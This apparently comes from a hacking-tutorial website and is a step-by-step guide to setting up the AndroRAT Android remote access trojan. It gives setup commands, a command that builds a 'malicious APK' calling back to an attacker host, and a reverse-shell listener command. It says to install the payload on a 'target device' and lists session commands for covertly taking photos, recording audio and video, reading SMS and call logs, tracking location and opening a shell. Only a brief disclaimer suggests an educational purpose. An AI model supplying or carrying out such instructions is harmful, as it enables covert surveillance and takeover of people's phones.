How To Use Remote Access Trojan AndroRAT | All Errors Solved

AndroRAT, or Android Remote Administration Tool, is a free software that allows someone to control an Android device remotely. It was initially created for research and educational purposes but has also been used for harmful activities. This guide explains how AndroRAT functions and how it can be used responsibly in penetration testing.

Disclaimer: This article is for educational purposes only. Unauthroized use of AndroRAT on devices without permission is illegal and punishable by law.

Prerequisites

Before using AndroRAT, you need:

• A Computer running Windows or Linux
• Java Development Kit (JDK) installed
• A Port Forwarding Service (to access device on a different network)

Downloading AndroRAT

You can find AndroRAT's source code on Github. Clone it using the following command:

git clone https://github.com/karma9874/AndroRAT

cd AndroRAT

python3 -m venv myenv

source myenv/bin/activate

pip3 install -r requirements.txt

Now, wait until all the required packages are installed.

Fixing Errors In AndroRAT Files

After successful installation, you have to make some little changes in androRAT.py file by removing or commenting the following lines of code that no longer supported.

• Remove lines 8 to 14: You can edit the androRAT.py file with any text editor. Remove or comment out lines 8 to 14, as the ngrok setup is outdated and no longer supports port forwarding.

Now you can simply type the following command to see the successful execution banner of androRAT

chmod +x androRAT.py

./androRAT.py --help

Now all the helping commands and descriptions are visible in the terminal.

Generating Payload

1. Generate a Malicious APK: To create a payload, type the following command:

./androRAT.py --build -i type_your_host -p type_your_port -o

You don't have to provide any name for the output file and may change it later by renaming it.

2. Reverse Shell: To start the listener, simply type the following command:

./androRAT.py --shell -i type_listning_host -p type_listning_port

Now install your payload APK into the target device and open it to get remote access.

3. Gain Remote Access: Once the target installs and opens the APK, the connection will be established, and you will get a session:

    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter

Conclusion

AndroRAT is a powerful tool for Android penetration testing, but it must be used responsibly. Understanding its capabilities helps in enhancing cybersecurity defense against such threats.

Join Our Premium Membership To Get Access To Our Exclusive Hacking Tutorials, Premium Tools, and much more.

Click Here To Join